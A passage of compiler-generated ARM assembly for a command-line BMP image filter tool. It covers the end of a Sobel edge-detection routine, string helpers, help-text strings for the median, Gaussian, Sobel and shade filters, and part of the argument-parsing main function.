#188 mov lr, r3 ldmia lr!, {r0, r1, r2, r3} stmia ip!, {r0, r1, r2, r3} ldm lr, {r0, r1} stm ip, {r0, r1} mov r3, #0 str r3, [fp, #-244] b .L90 .L105: mov r3, #0 str r3, [fp, #-240] b .L91 .L104: mov r2, #0 mov r3, #0 str r2, [fp, #-196] str r3, [fp, #-192] mov r3, #0 str r3, [fp, #-236] b .L92 .L98: ldr r3, [fp, #-244] cmp r3, #0 beq .L93 ldr r3, [fp, #-260] sub r3, r3, #1 ldr r2, [fp, #-244] cmp r2, r3 bcs .L93 ldr r3, [fp, #-240] cmp r3, #0 beq .L93 ldr r3, [fp, #-256] sub r3, r3, #1 ldr r2, [fp, #-240] cmp r2, r3 bcs .L93 ldrb r3, [fp, #-245] @ zero_extendqisi2 cmp r3, #121 beq .L94 mov r2, #0 ldr r3, .L115+16 str r2, [sp, #16] str r3, [sp, #20] mov r3, #3 str r3, [sp, #12] sub r3, fp, #164 str r3, [sp, #8] ldr r3, [fp, #-236] str r3, [sp, #4] ldr r3, [fp, #-244] str r3, [sp] ldr r3, [fp, #-240] ldr r2, [fp, #-260] ldr r1, [fp, #-256] ldr r0, [fp, #-252] bl use_mask mov r2, r0 mov r3, r1 mov r1, r2 str r1, [fp, #-212] bic r3, r3, #-2147483648 str r3, [fp, #-208] .L94: ldrb r3, [fp, #-245] @ zero_extendqisi2 cmp r3, #120 beq .L95 mov r2, #0 ldr r3, .L115+16 str r2, [sp, #16] str r3, [sp, #20] mov r3, #3 str r3, [sp, #12] sub r3, fp, #92 str r3, [sp, #8] ldr r3, [fp, #-236] str r3, [sp, #4] ldr r3, [fp, #-244] str r3, [sp] ldr r3, [fp, #-240] ldr r2, [fp, #-260] ldr r1, [fp, #-256] ldr r0, [fp, #-252] bl use_mask mov r2, r0 mov r3, r1 mov r1, r2 str r1, [fp, #-204] bic r3, r3, #-2147483648 str r3, [fp, #-200] .L95: ldrb r3, [fp, #-245] @ zero_extendqisi2 cmp r3, #120 bne .L96 ldr r3, [fp, #-236] lsl r3, r3, #3 sub r2, fp, #12 add r3, r2, r3 sub r3, r3, #176 ldmia r3, {r0-r1} sub r3, fp, #212 ldmia r3, {r2-r3} bl __aeabi_dmul mov r2, r0 mov r3, r1 sub r1, fp, #196 ldmia r1, {r0-r1} bl __aeabi_dadd mov r2, r0 mov r3, r1 str r2, [fp, #-196] str r3, [fp, #-192] b .L93 .L96: ldrb r3, [fp, #-245] @ zero_extendqisi2 cmp r3, #121 bne .L97 ldr r3, [fp, #-236] lsl r3, r3, #3 sub r2, fp, #12 add r3, r2, r3 sub r3, r3, #176 ldmia r3, {r0-r1} sub r3, fp, #204 ldmia r3, {r2-r3} bl __aeabi_dmul mov r2, r0 mov r3, r1 sub r1, fp, #196 ldmia r1, {r0-r1} bl __aeabi_dadd mov r2, r0 mov r3, r1 str r2, [fp, #-196] str r3, [fp, #-192] b .L93 .L97: sub r3, fp, #212 ldmia r3, {r2-r3} sub r1, fp, #212 ldmia r1, {r0-r1} bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r4, r2 mov r5, r3 sub r3, fp, #204 ldmia r3, {r2-r3} sub r1, fp, #204 ldmia r1, {r0-r1} bl __aeabi_dmul mov r2, r0 mov r3, r1 mov r0, r4 mov r1, r5 bl __aeabi_dadd mov r2, r0 mov r3, r1 mov r0, r2 mov r1, r3 bl sqrt ldr r3, [fp, #-236] lsl r3, r3, #3 sub r2, fp, #12 add r3, r2, r3 sub r3, r3, #176 ldmia r3, {r2-r3} bl __aeabi_dmul mov r2, r0 mov r3, r1 sub r1, fp, #196 ldmia r1, {r0-r1} bl __aeabi_dadd mov r2, r0 mov r3, r1 str r2, [fp, #-196] str r3, [fp, #-192] .L93: ldr r3, [fp, #-236] add r3, r3, #1 str r3, [fp, #-236] .L92: ldr r3, [fp, #-236] cmp r3, #2 ble .L98 ldmib fp, {r2-r3} sub r1, fp, #196 ldmia r1, {r0-r1} bl __aeabi_dcmpgt mov r3, r0 cmp r3, #0 beq .L114 mov r2, #0 ldr r3, .L115+20 str r2, [fp, #-196] str r3, [fp, #-192] b .L101 .L114: mov r2, #0 mov r3, #0 str r2, [fp, #-196] str r3, [fp, #-192] .L101: mov r3, #0 str r3, [fp, #-232] b .L102 .L103: ldr r3, [fp, #-244] ldr r2, [fp, #-256] mul r2, r3, r2 ldr r3, [fp, #-240] add r2, r2, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 ldr r2, [fp, #-216] add r4, r2, r3 sub r1, fp, #196 ldmia r1, {r0-r1} bl __aeabi_d2uiz mov r3, r0 and r2, r3, #255 ldr r3, [fp, #-232] add r3, r4, r3 strb r2, [r3] ldr r3, [fp, #-232] add r3, r3, #1 str r3, [fp, #-232] .L102: ldr r3, [fp, #-232] cmp r3, #2 ble .L103 ldr r3, [fp, #-240] add r3, r3, #1 str r3, [fp, #-240] .L91: ldr r2, [fp, #-240] ldr r3, [fp, #-256] cmp r2, r3 bcc .L104 ldr r3, [fp, #-244] add r3, r3, #1 str r3, [fp, #-244] .L90: ldr r2, [fp, #-244] ldr r3, [fp, #-260] cmp r2, r3 bcc .L105 mov r3, #0 str r3, [fp, #-228] b .L106 .L111: mov r3, #0 str r3, [fp, #-224] b .L107 .L110: mov r3, #0 str r3, [fp, #-220] b .L108 .L109: ldr r3, [fp, #-228] ldr r2, [fp, #-256] mul r2, r3, r2 ldr r3, [fp, #-224] add r2, r2, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 ldr r2, [fp, #-216] add r1, r2, r3 ldr r3, [fp, #-252] ldr r0, [r3] ldr r3, [fp, #-228] ldr r2, [fp, #-256] mul r2, r3, r2 ldr r3, [fp, #-224] add r2, r2, r3 mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 add r2, r0, r3 ldr r3, [fp, #-220] add r3, r2, r3 ldr r2, [fp, #-220] add r2, r1, r2 ldrb r2, [r2] @ zero_extendqisi2 strb r2, [r3] ldr r3, [fp, #-220] add r3, r3, #1 str r3, [fp, #-220] .L108: ldr r3, [fp, #-220] cmp r3, #2 ble .L109 ldr r3, [fp, #-224] add r3, r3, #1 str r3, [fp, #-224] .L107: ldr r2, [fp, #-224] ldr r3, [fp, #-256] cmp r2, r3 bcc .L110 ldr r3, [fp, #-228] add r3, r3, #1 str r3, [fp, #-228] .L106: ldr r2, [fp, #-228] ldr r3, [fp, #-260] cmp r2, r3 bcc .L111 ldr r0, [fp, #-216] bl free nop ldr r3, .L115 ldr r2, [r3] ldr r3, [fp, #-16] eors r2, r3, r2 mov r3, #0 beq .L112 bl __stack_chk_fail .L112: sub sp, fp, #12 @ sp needed pop {r4, r5, fp, pc} .L116: .align 2 .L115: .word .LC6 .word .LC0 .word .LC1 .word .LC2 .word 1072693248 .word 1081073664 .size sobel_xy, .-sobel_xy .align 2 .global compare .syntax unified .arm .fpu softvfp .type compare, %function compare: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #20 str r0, [fp, #-16] str r1, [fp, #-20] mov r3, #0 str r3, [fp, #-8] b .L118 .L122: ldr r3, [fp, #-8] ldr r2, [fp, #-16] add r3, r2, r3 ldrb r2, [r3] @ zero_extendqisi2 ldr r3, [fp, #-8] ldr r1, [fp, #-20] add r3, r1, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r2, r3 beq .L119 mov r3, #0 b .L120 .L119: ldr r3, [fp, #-8] add r3, r3, #1 str r3, [fp, #-8] .L118: ldr r3, [fp, #-8] ldr r2, [fp, #-16] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #0 beq .L121 ldr r3, [fp, #-8] ldr r2, [fp, #-20] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #0 bne .L122 .L121: ldr r3, [fp, #-8] ldr r2, [fp, #-16] add r3, r2, r3 ldrb r2, [r3] @ zero_extendqisi2 ldr r3, [fp, #-8] ldr r1, [fp, #-20] add r3, r1, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r2, r3 beq .L123 mov r3, #0 b .L120 .L123: mov r3, #1 .L120: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size compare, .-compare .align 2 .global strgs .syntax unified .arm .fpu softvfp .type strgs, %function strgs: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-24] str r1, [fp, #-28] ldr r3, [fp, #-24] ldr r3, [r3] str r3, [fp, #-8] mov r0, #4 bl malloc mov r3, r0 str r3, [fp, #-20] mov r3, #0 str r3, [fp, #-16] mov r3, #0 str r3, [fp, #-12] b .L125 .L139: ldr r3, [fp, #-12] ldr r2, [fp, #-8] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #32 beq .L126 ldr r3, [fp, #-12] ldr r2, [fp, #-8] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #9 beq .L126 ldr r3, [fp, #-12] ldr r2, [fp, #-8] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #34 bne .L127 ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] ldr r3, [fp, #-16] add r3, r3, #1 str r3, [fp, #-16] ldr r3, [fp, #-16] lsl r3, r3, #2 mov r1, r3 ldr r0, [fp, #-20] bl realloc str r0, [fp, #-20] ldr r2, [fp, #-12] ldr r3, [fp, #-16] sub r3, r3, #-1073741823 lsl r3, r3, #2 ldr r1, [fp, #-20] add r3, r1, r3 ldr r1, [fp, #-8] add r2, r1, r2 str r2, [r3] b .L128 .L130: ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] .L128: ldr r3, [fp, #-12] ldr r2, [fp, #-8] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #34 beq .L129 ldr r3, [fp, #-12] ldr r2, [fp, #-8] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #0 beq .L129 ldr r3, [fp, #-12] ldr r2, [fp, #-8] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #10 bne .L130 .L129: ldr r3, [fp, #-12] ldr r2, [fp, #-8] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #0 beq .L131 ldr r3, [fp, #-12] ldr r2, [fp, #-8] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #10 bne .L132 .L131: ldr r3, [fp, #-28] mov r2, #0 str r2, [r3] ldr r0, [fp, #-20] bl free mov r3, #0 b .L133 .L132: ldr r3, [fp, #-12] ldr r2, [fp, #-8] add r3, r2, r3 mov r2, #0 strb r2, [r3] ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] b .L125 .L127: ldr r3, [fp, #-16] add r3, r3, #1 str r3, [fp, #-16] ldr r3, [fp, #-16] lsl r3, r3, #2 mov r1, r3 ldr r0, [fp, #-20] bl realloc str r0, [fp, #-20] ldr r2, [fp, #-12] ldr r3, [fp, #-16] sub r3, r3, #-1073741823 lsl r3, r3, #2 ldr r1, [fp, #-20] add r3, r1, r3 ldr r1, [fp, #-8] add r2, r1, r2 str r2, [r3] b .L135 .L137: ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] .L135: ldr r3, [fp, #-12] ldr r2, [fp, #-8] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #0 beq .L136 ldr r3, [fp, #-12] ldr r2, [fp, #-8] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #10 beq .L136 ldr r3, [fp, #-12] ldr r2, [fp, #-8] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #32 beq .L136 ldr r3, [fp, #-12] ldr r2, [fp, #-8] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #9 bne .L137 .L136: ldr r3, [fp, #-12] ldr r2, [fp, #-8] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #0 beq .L125 ldr r3, [fp, #-12] ldr r2, [fp, #-8] add r3, r2, r3 mov r2, #0 strb r2, [r3] ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] b .L125 .L126: ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] .L125: ldr r3, [fp, #-12] ldr r2, [fp, #-8] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #0 beq .L138 ldr r3, [fp, #-12] ldr r2, [fp, #-8] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #10 bne .L139 .L138: ldr r3, [fp, #-28] ldr r2, [fp, #-16] str r2, [r3] ldr r3, [fp, #-20] .L133: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size strgs, .-strgs .section .rodata .align 2 .LC7: .ascii "\012\011this program allows you to use certain filt" .ascii "ers for bmp-24 and bmp-32 images\000" .align 2 .LC8: .ascii "\011input format: <input file name> <filter with mo" .ascii "dificators> <output file name>\000" .align 2 .LC9: .ascii "\011enter <help> for details\000" .align 2 .LC10: .ascii "\011enter <exit> for finish\012\000" .align 2 .LC11: .ascii "My_inst > \000" .align 2 .LC12: .ascii "help\000" .align 2 .LC13: .ascii "\012\011filters supported:\012\000" .align 2 .LC14: .ascii "\011<median>\000" .align 2 .LC15: .ascii "\011\011/sz - matrix size\012\000" .align 2 .LC16: .ascii "\011<gaussian>\000" .align 2 .LC17: .ascii "\011\011/sz - matrix size\000" .align 2 .LC18: .ascii "\011\011/sg - sigma\012\000" .align 2 .LC19: .ascii "\011<sobel> <sobel_x> <sobel_y>\000" .align 2 .LC20: .ascii "\011\011/th - threshold, pixels in shades of gray f" .ascii "rom (255 / th) is white, the rest are black\000" .align 2 .LC21: .ascii "\012\011<shade>\000" .align 2 .LC22: .ascii "\012\011you can use modificators like <gaussian /sz" .ascii " = 5>\000" .align 2 .LC23: .ascii "\012\011without modifiers standard values will be t" .ascii "aken:\000" .align 2 .LC24: .ascii "\011\011sz = 3\012\011\011sg = 0.6\012\011\011th = " .ascii "2.0\012\000" .align 2 .LC25: .ascii "exit\000" .align 2 .LC26: .ascii "invalid input\000" .align 2 .LC27: .ascii "rb\000" .align 2 .LC28: .ascii "can't open file '%s'\012\000" .align 2 .LC29: .ascii "median\000" .align 2 .LC30: .ascii "gaussian\000" .align 2 .LC31: .ascii "sobel\000" .align 2 .LC32: .ascii "sobel_x\000" .align 2 .LC33: .ascii "sobel_y\000" .align 2 .LC34: .ascii "shade\000" .align 2 .LC35: .ascii "invalid filter input\000" .align 2 .LC36: .ascii "modificator invalid input\000" .align 2 .LC37: .ascii "wb\000" .align 2 .LC38: .ascii "'%s' reading error\012\000" .align 2 .LC39: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 104 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #124 str r0, [fp, #-112] str r1, [fp, #-116] ldr r3, .L230 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 mov r3, #0 strb r3, [fp, #-106] .L219: mov r3, #3 str r3, [fp, #-72] ldr r2, .L230+4 ldr r3, .L230+8 str r2, [fp, #-36] str r3, [fp, #-32] mov r2, #0 ldr r3, .L230+12 str r2, [fp, #-28] str r3, [fp, #-24] mov r3, #0 str r3, [fp, #-80] ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 beq .L141 ldr r0, [fp, #-116] bl free ldr r3, [fp, #-80] mov r0, r3 bl free .L141: mov r0, #3 bl malloc mov r3, r0 str r3, [fp, #-80] ldr r3, [fp, #-80] mov r2, #97 strb r2, [r3] ldr r3, [fp, #-80] add r3, r3, #1 mov r2, #32 strb r2, [r3] ldr r3, [fp, #-112] cmp r3, #3 ble .L142 ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 beq .L143 .L142: ldr r3, [fp, #-112] cmp r3, #1 beq .L144 ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 beq .L145 .L144: ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 bne .L146 ldr r0, .L230+16 bl puts ldr r0, .L230+20 bl puts ldr r0, .L230+24 bl puts ldr r0, .L230+28 bl puts mov r3, #1 strb r3, [fp, #-106] .L146: ldr r0, .L230+32 bl printf mov r3, #2 str r3, [fp, #-68] .L149: bl getchar mov r1, r0 ldr r2, [fp, #-80] ldr r3, [fp, #-68] add r3, r2, r3 and r2, r1, #255 strb r2, [r3] ldr r2, [fp, #-80] ldr r3, [fp, #-68] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #10 bne .L147 ldr r2, [fp, #-80] ldr r3, [fp, #-68] add r3, r2, r3 mov r2, #0 strb r2, [r3] nop sub r2, fp, #112 sub r3, fp, #80 mov r1, r2 mov r0, r3 bl strgs str r0, [fp, #-116] b .L145 .L147: ldr r2, [fp, #-80] ldr r3, [fp, #-68] add r3, r3, #2 mov r1, r3 mov r0, r2 bl realloc mov r3, r0 str r3, [fp, #-80] ldr r3, [fp, #-68] add r3, r3, #1 str r3, [fp, #-68] b .L149 .L145: ldr r3, [fp, #-112] cmp r3, #2 bne .L150 ldr r3, [fp, #-116] add r3, r3, #4 ldr r3, [r3] ldr r1, .L230+36 mov r0, r3 bl compare mov r3, r0 cmp r3, #0 beq .L151 ldr r0, .L230+40 bl puts ldr r0, .L230+44 bl puts ldr r0, .L230+48 bl puts ldr r0, .L230+52 bl puts ldr r0, .L230+56 bl puts ldr r0, .L230+60 bl puts ldr r0, .L230+64 bl puts ldr r0, .L230+68 bl puts ldr r0, .L230+72 bl puts ldr r0, .L230+76 bl puts ldr r0, .L230+80 bl puts ldr r0, .L230+84 bl puts ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 bne .L221 mov r3, #0 b .L218 .L151: ldr r3, [fp, #-116] add r3, r3, #4 ldr r3, [r3] ldr r1, .L230+88 mov r0, r3 bl compare mov r3, r0 cmp r3, #0 beq .L155 mov r3, #0 b .L218 .L155: ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 beq .L156 ldr r0, .L230+92 bl puts b .L217 .L156: mvn r3, #0 b .L218 .L150: ldr r3, [fp, #-112] cmp r3, #1 bne .L157 ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 bne .L222 .L157: ldr r3, [fp, #-112] cmp r3, #3 bgt .L143 ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 beq .L158 ldr r0, .L230+92 bl puts b .L217 .L158: mvn r3, #0 b .L218 .L143: ldr r3, [fp, #-116] add r3, r3, #4 ldr r1, [r3] sub r3, fp, #104 ldr r2, .L230+96 mov r0, r3 bl fopen_s mov r3, r0 cmp r3, #0 beq .L159 ldr r3, [fp, #-116] add r3, r3, #4 ldr r3, [r3] mov r1, r3 ldr r0, .L230+100 bl printf ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 bne .L223 mvn r3, #0 b .L218 .L159: ldr r3, [fp, #-116] add r3, r3, #8 ldr r3, [r3] ldr r1, .L230+104 mov r0, r3 bl compare mov r3, r0 cmp r3, #0 bne .L161 ldr r3, [fp, #-116] add r3, r3, #8 ldr r3, [r3] ldr r1, .L230+108 mov r0, r3 bl compare mov r3, r0 cmp r3, #0 bne .L161 ldr r3, [fp, #-116] add r3, r3, #8 ldr r3, [r3] ldr r1, .L230+112 mov r0, r3 bl compare mov r3, r0 cmp r3, #0 bne .L161 ldr r3, [fp, #-116] add r3, r3, #8 ldr r3, [r3] ldr r1, .L230+116 mov r0, r3 bl compare mov r3, r0 cmp r3, #0 bne .L161 ldr r3, [fp, #-116] add r3, r3, #8 ldr r3, [r3] ldr r1, .L230+120 mov r0, r3 bl compare mov r3, r0 cmp r3, #0 bne .L161 ldr r3, [fp, #-116] add r3, r3, #8 ldr r3, [r3] ldr r1, .L230+124 mov r0, r3 bl compare mov r3, r0 cmp r3, #0 bne .L161 ldr r0, .L230+128 bl puts ldr r3, [fp, #-104] mov r0, r3 bl fclose ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 bne .L224 mvn r3, #0 b .L218 .L161: mov r3, #3 str r3, [fp, #-64] mov r3, #0 strb r3, [fp, #-105] b .L163 .L191: ldr r3, [fp, #-64] add r3, r3, #1 lsl r3, r3, #2 ldr r2, [fp, #-116] add r3, r2, r3 ldr r3, [r3] ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #61 beq .L164 ldr r0, .L230+132 bl puts ldr r3, [fp, #-104] mov r0, r3 bl fclose ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 bne .L165 mvn r3, #0 b .L218 .L165: mov r3, #1 strb r3, [fp, #-105] b .L190 .L164: mov r3, #0 str r3, [fp, #-60] b .L168 .L172: ldr r3, [fp, #-64] lsl r3, r3, #2 ldr r2, [fp, #-116] add r3, r2, r3 ldr r2, [r3] ldr r3, [fp, #-60] add r3, r3, #1 add r3, r2, r3 ldrb r1, [r3] @ zero_extendqisi2 sub r2, fp, #20 ldr r3, [fp, #-60] add r3, r2, r3 mov r2, r1 strb r2, [r3] sub r2, fp, #20 ldr r3, [fp, #-60] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #0 bne .L169 ldr r0, .L230+132 bl puts ldr r3, [fp, #-104] mov r0, r3 bl fclose ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 bne .L170 mvn r3, #0 b .L218 .L170: mov r3, #1 strb r3, [fp, #-105] b .L171 .L169: ldr r3, [fp, #-60] add r3, r3, #1 str r3, [fp, #-60] .L168: ldr r3, [fp, #-60] cmp r3, #1 ble .L172 .L171: ldrb r3, [fp, #-105] @ zero_extendqisi2 cmp r3, #0 bne .L225 ldr r3, [fp, #-64] lsl r3, r3, #2 ldr r2, [fp, #-116] add r3, r2, r3 ldr r3, [r3] add r3, r3, #3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #0 beq .L174 ldr r0, .L230+132 bl puts ldr r3, [fp, #-104] mov r0, r3 bl fclose ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 bne .L175 mvn r3, #0 b .L218 .L175: mov r3, #1 strb r3, [fp, #-105] b .L190 .L174: ldr r3, [fp, #-64] add r3, r3, #2 str r3, [fp, #-64] mov r3, #0 str r3, [fp, #-56] b .L176 .L181: ldr r3, [fp, #-64] lsl r3, r3, #2 ldr r2, [fp, #-116] add r3, r2, r3 ldr r2, [r3] ldr r3, [fp, #-56] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #47 bls .L177 ldr r3, [fp, #-64] lsl r3, r3, #2 ldr r2, [fp, #-116] add r3, r2, r3 ldr r2, [r3] ldr r3, [fp, #-56] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #57 bls .L178 .L177: ldr r3, [fp, #-64] lsl r3, r3, #2 ldr r2, [fp, #-116] add r3, r2, r3 ldr r2, [r3] ldr r3, [fp, #-56] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #46 beq .L178 ldr r0, .L230+132 bl puts ldr r3, [fp, #-104] mov r0, r3 bl fclose ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 bne .L179 mvn r3, #0 b .L218 .L179: mov r3, #1 strb r3, [fp, #-105] b .L180 .L178: ldr r3, [fp, #-56] add r3, r3, #1 str r3, [fp, #-56] .L176: ldr r3, [fp, #-64] lsl r3, r3, #2 ldr r2, [fp, #-116] add r3, r2, r3 ldr r2, [r3] ldr r3, [fp, #-56] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #0 bne .L181 .L180: ldrb r3, [fp, #-105] @ zero_extendqisi2 cmp r3, #0 bne .L226 ldrb r3, [fp, #-20] @ zero_extendqisi2 cmp r3, #115 bne .L183 ldrb r3, [fp, #-19] @ zero_extendqisi2 cmp r3, #122 bne .L184 ldr r3, [fp, #-64] lsl r3, r3, #2 ldr r2, [fp, #-116] add r3, r2, r3 ldr r3, [r3] mov r0, r3 bl atoi mov r3, r0 sub r4, r3, #1 ldr r3, [fp, #-64] lsl r3, r3, #2 ldr r2, [fp, #-116] add r3, r2, r3 ldr r3, [r3] mov r0, r3 bl atoi mov r3, r0 cmp r3, #0 and r3, r3, #1 rsblt r3, r3, #0 add r3, r4, r3 str r3, [fp, #-72] b .L185 .L184: ldrb r3, [fp, #-19] @ zero_extendqisi2 cmp r3, #103 bne .L186 ldr r3, [fp, #-64] lsl r3, r3, #2 ldr r2, [fp, #-116] add r3, r2, r3 ldr r3, [r3] mov r0, r3 bl atof str r0, [fp, #-36] str r1, [fp, #-32] b .L185 .L186: ldr r0, .L230+132 bl puts ldr r3, [fp, #-104] mov r0, r3 bl fclose ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 bne .L187 mvn r3, #0 b .L218 .L187: mov r3, #1 strb r3, [fp, #-105] b .L190 .L183: ldrb r3, [fp, #-20] @ zero_extendqisi2 cmp r3, #116 bne .L188 ldrb r3, [fp, #-19] @ zero_extendqisi2 cmp r3, #104 bne .L188 ldr r3, [fp, #-64] lsl r3, r3, #2 ldr r2, [fp, #-116] add r3, r2, r3 ldr r3, [r3] mov r0, r3 bl atof mov r2, r0 mov r3, r1 mov r0, #0 ldr r1, .L230+136 bl __aeabi_ddiv mov r2, r0 mov r3, r1 str r2, [fp, #-28] str r3, [fp, #-24] b .L185 .L188: ldr r0, .L230+132 bl puts ldr r3, [fp, #-104] mov r0, r3 bl fclose ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 bne .L189 mvn r3, #0 b .L218 .L189: mov r3, #1 strb r3, [fp, #-105] b .L190 .L185: ldr r3, [fp, #-64] add r3, r3, #1 str r3, [fp, #-64] .L163: ldr r3, [fp, #-64] lsl r3, r3, #2 ldr r2, [fp, #-116] add r3, r2, r3 ldr r3, [r3] ldrb r3, [r3] @ zero_extendqisi2 cmp r3, #47 bne .L190 ldr r3, [fp, #-64] add r2, r3, #3 ldr r3, [fp, #-112] cmp r2, r3 blt .L191 b .L190 .L225: nop b .L190 .L226: nop .L190: ldrb r3, [fp, #-105] @ zero_extendqisi2 cmp r3, #0 bne .L227 ldr r3, [fp, #-64] lsl r3, r3, #2 ldr r2, [fp, #-116] add r3, r2, r3 ldr r1, [r3] sub r3, fp, #100 ldr r2, .L230+140 mov r0, r3 bl fopen_s mov r3, r0 cmp r3, #0 beq .L193 ldr r0, .L230+92 bl puts ldr r3, [fp, #-104] mov r0, r3 bl fclose ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 bne .L228 mvn r3, #0 b .L218 .L193: ldr r3, [fp, #-64] add r2, r3, #1 ldr r3, [fp, #-112] cmp r2, r3 bge .L195 ldr r0, .L230+92 bl puts ldr r3, [fp, #-104] mov r0, r3 bl fclose ldr r3, [fp, #-100] mov r0, r3 bl fclose ldrb r3, [fp, #-106] @ zero_extendqisi2 cmp r3, #0 bne .L229 mvn r3, #0 b .L218 .L195: ldr r0, [fp, #-104] ldr r1, [fp, #-100] sub ip, fp, #84 sub r2, fp, #88 sub r3, fp, #92 str r3, [sp, #4] sub r3, fp, #96 str r3, [sp] mov r3, ip bl read_and_write_bmp mov r3, r0 cmp r3, #0 bne .L197 ldr r3, [fp, #-92] cmp r3, #0 beq .L198 mov r3, #32 str r3, [fp, #-76] b .L199 .L198: mov r3, #24 str r3, [fp, #-76] .L199: ldr r3, [fp, #-116] add r3, r3, #8 ldr r3, [r3] ldr r1, .L230+104 mov r0, r3 bl compare mov r3, r0 cmp r3, #0 beq .L200 ldr r0, [fp, #-88] ldr ip, [fp, #-84] sub r1, fp, #96 sub r3, fp, #36 ldmia r3, {r2-r3} str r2, [sp, #8] str r3, [sp, #12] ldr r3, [fp, #-72] str r3, [sp] mov r3, ip mov r2, r0 mov r0, #109 bl megas b .L201 .L200: ldr r3, [fp, #-116] add r3, r3, #8 ldr r3, [r3] ldr r1, .L230+108 mov r0, r3 bl compare mov r3, r0 cmp r3, #0 beq .L202 ldr r0, [fp, #-88] ldr ip, [fp, #-84] sub r1, fp, #96 sub r3, fp, #36 ldmia r3, {r2-r3} str r2, [sp, #8] str r3, [sp, #12] ldr r3, [fp, #-72] str r3, [sp] mov r3, ip mov r2, r0 mov r0, #103 bl megas b .L201 .L202: ldr r3, [fp, #-116] add r3, r3, #8 ldr r3, [r3] ldr r1, .L230+112 mov r0, r3 bl compare mov r3, r0 cmp r3, #0 beq .L203 ldr r0, [fp, #-88] ldr ip, [fp, #-84] sub r1, fp, #96 sub r3, fp, #28 ldmia r3, {r2-r3} stm sp, {r2-r3} mov r3, ip mov r2, r0 mov r0, #0 bl sobel_xy b .L201 .L203: ldr r3, [fp, #-116] add r3, r3, #8 ldr r3, [r3] ldr r1, .L230+116 mov r0, r3 bl compare mov r3, r0 cmp r3, #0 beq .L204 ldr r0, [fp, #-88] ldr ip, [fp, #-84] sub r1, fp, #96 sub r3, fp, #28 ldmia r3, {r2-r3} stm sp, {r2-r3} mov r3, ip mov r2, r0 mov r0, #120 bl sobel_xy b .L201 .L204: ldr r3, [fp, #-116] add r3, r3, #8 ldr r3, [r3] ldr r1, .L230+120 mov r0, r3 bl compare mov r3, r0 cmp r3, #0 beq .L205 ldr r0, [fp, #-88] ldr ip, [fp, #-84] sub r1, fp, #96 sub r3, fp, #28 